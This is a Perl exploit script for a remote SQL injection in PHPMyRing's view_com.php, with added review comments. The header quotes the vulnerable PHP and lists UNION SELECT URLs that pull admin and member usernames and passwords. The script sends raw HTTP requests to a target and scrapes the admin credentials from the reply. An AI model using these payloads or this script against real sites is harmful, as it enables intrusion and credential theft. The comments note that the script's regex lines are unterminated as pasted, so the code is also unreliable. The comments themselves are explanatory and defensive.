#######################################################################=0D
# =0D
# PHPMyRing's (view_com.php) Remote SQL injection Exploit=0D
# =0D
# vulnerable code on view_com.php line ( 14 - 24)=0D
# =0D
# [code]=0D
# -----------------------------------------------------------------------------------=0D
# if (!$idsite)=0D
# {=0D
# echo ""._("Erreur! Le n° du site n'est pas défini!")."
";=0D
# }=0D
# else=0D
# {=0D
# // On va aller chercher le nom du site concerné, ça sera fait ;)
# // Connexion MySQL=0D
# $conn=connecte();=0D
# $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection=0D
# $site_nom=$row['site_nom'];=0D
# =0D
# ...............=0D
# =0D
# =0D
# xmlns="http://www.w3.org/1999/xhtml" xml:lang=" echo _("fr"); ?>">=0D
# =0D
# echo _("Commentaires du site"). " ".$site_nom; ?> =0D
# ---------------------------------------------------------------------------------[/code]=0D
# =0D
# $idsite is not properly verified and can be used to inject SQL into the query
# =0D
#============0D
# Exploit :=0D
#============0D
# =0D
# http://localhost/webring/view_com.php?idsite=[SQL]=0D
# =0D
#============0D
# Exemples : =0D
#============0D
# =0D
# [+] the first PoC URL will display the admin username in the page title and the second the admin password
# =0D
# http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm=0D
# =0D
# http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm=0D
# =0D
# =0D
# [+] this will display members username (1) and password(2) in page title=0D
# =0D
# 1) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20pseudo%20FROM%20webring%20WHERE%20idsite=[victimesiteid]=0D
# =0D
# 2) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20mdp%20FROM%20webring%20WHERE%20idsite=[victimesiteid]=0D
# =0D
# Exploit to extract both admin login and plain text password:=0D
#=0D
# C:\>perl ring.pl 127.0.0.1 webring=0D
# #################################################=0D
# # PHPMyRing's Remote SQL injection Exploit #=0D
# # Discovered by simo64_at_morx_org #=0D
# # Script writting by simo_at_morx_org #=0D
# # MorX Security Research Team #=0D
# # www.morx.org #=0D
# #################################################=0D
=0D
# [*] Trying to get the admin login ...=0D
=0D
# [+] your admin login is --> admin=0D
=0D
# [+] your admin pass is --> 123456=0D
=0D
use IO::Socket;=0D
=0D
# Usage check: prints the banner and exits when a command-line argument is missing.
# NOTE(review): defined() is applied to the result of `$ARGV[0] && $ARGV[1]`, not to
# each argument. A defined-but-false first argument such as "0" short-circuits the
# `&&` and is treated as a complete argument list even when $ARGV[1] is absent.
# The file has no `use strict`/`use warnings`, which is why the barewords and
# package globals below parse at all.
if(!defined($ARGV[0] && $ARGV[1])) {=0D
=0D
# Bareword `clear` (no strict) is passed as the string "clear" and executed
# through system(); the return value is not checked.
system (clear);=0D
print "\n";=0D
print "#################################################\n";=0D
print "# PHPMyRing's Remote SQL injection Exploit #\n";=0D
print "# Discovered by simo64_at_morx_org #\n";=0D
print "# Script writting by simo_at_morx_org #\n";=0D
print "# MorX Security Research Team #\n";=0D
print "# www.morx.org #\n";=0D
print "#################################################\n\n";=0D
=0D
# $0 is the script name; the usage line itself does not list the two expected
# arguments (host, application folder) -- only the example line shows them.
print "--- Usage: perl $0 \n";=0D
print "--- Example: perl $0 127.0.0.1 afd_webring\n\n";=0D
exit; }=0D
=0D
# Target host (first argument) and the application's URL folder (second argument).
$TARGET = $ARGV[0];=0D
=0D
$FOLDER = $ARGV[1];=0D
=0D
# Port is hard-coded as the string "80"; there is no way to select HTTPS or
# another port from the command line.
$PORT = "80";=0D
=0D
# Path of the vulnerable page; the idsite parameter is appended verbatim.
$SCRIPT = "/view_com.php?idsite=";=0D
=0D
# URL-encoded query-string payloads. From a detection standpoint these are the
# strings that appear in the web server's access log and in WAF request
# inspection: a negative idsite followed by %20UNION%20SELECT ... FROM webring_adm.
$SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";=0D
=0D
$SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";=0D
=0D
################################################################################=0D
=0D
# Raw HTTP/1.1 request lines, assembled by hand (no HTTP client library).
# COMMAND1/COMMAND4 are the two request lines; COMMAND2 is the Host header
# and COMMAND3 asks the server to close the connection after the response.
$COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";=0D
$COMMAND2 = "Host: $TARGET";=0D
$COMMAND3 = "Connection: Close";=0D
$COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";=0D
=0D
# First TCP connection to the target. The parenthesised call means `||` applies
# to new()'s return value, so a failed connect dies here; the error message does
# not include $! or the port.
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")=0D
|| die "Can't connect to $TARGET";=0D
=0D
print "#################################################\n";=0D
print "# PHPMyRing's Remote SQL injection Exploit #\n";=0D
print "# Discovered by simo64_at_morx_org #\n";=0D
print "# Script writting by simo_at_morx_org #\n";=0D
print "# MorX Security Research Team #\n";=0D
print "# www.morx.org #\n";=0D
print "#################################################\n\n";=0D
=0D
# Cosmetic pause only; nothing is waited for.
sleep 2;=0D
=0D
print "[*] Trying to get the admin login ...\n\n";=0D
=0D
# Sends request line, Host header, Connection header and a blank line. Line
# endings are bare LF rather than the CRLF HTTP/1.1 specifies.
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";=0D
=0D
# Reads the response line by line until the server closes the connection.
while ($result = <$remote> ) {=0D
=0D
# NOTE(review): the pattern literal below has no closing delimiter as pasted, so
# this line does not parse as written; the surrounding markup was presumably lost
# in the same way the HTML tags in the header's PHP listing were -- TODO confirm
# against the original file. Whatever follows "site " on the matching line is
# captured into $1 and treated as the value the injected SELECT returned.
if ($result =~ /site (.*?) ) {=0D
$adminlogin = $1;=0D
print "[+] your admin login is --> $adminlogin\n\n";=0D
# $a is Perl's sort() package global and is never initialised to 0 here; the
# `== 0` test further down relies on undef numifying to 0 (no `use warnings`).
$a = 1;=0D
}=0D
}=0D
=0D
if ($a == 0) =0D
{ =0D
print "[-] Failed, cant get the admin login\n\n";=0D
# This progress message is only printed on the failure path; on success the
# second request below is sent silently.
print "[*] Trying to get the admin password ...\n\n";=0D
}=0D
=0D
# Second connection for the password query. The first socket is not closed
# explicitly; reassigning the global $remote drops the previous handle, which
# presumably closes it on destruction -- not verified here.
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")=0D
|| die "Can't connect to $TARGET";=0D
=0D
# Same hand-built request as above with the second payload (LF line endings).
print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";=0D
=0D
while ($result2 = <$remote> ) {=0D
=0D
# NOTE(review): same unterminated pattern literal as in the first loop; see the
# note there. Matching mirrors the login extraction, capturing into $1.
if ($result2 =~ /site (.*?) ) {=0D
$adminpass = $1;=0D
print "[+] your admin pass is --> $adminpass\n\n";=0D
# $b is the other sort() package global; same uninitialised `== 0` idiom as $a.
$b = 1;=0D
}=0D
}=0D
=0D
if ($b == 0)=0D
{ print "[-] Failed, cant get the admin password\n";=0D
}=0D
=0D
# Only the second socket is flushed and closed explicitly; close()'s return
# value is not checked.
$remote->flush();=0D
close($remote);=0D
exit;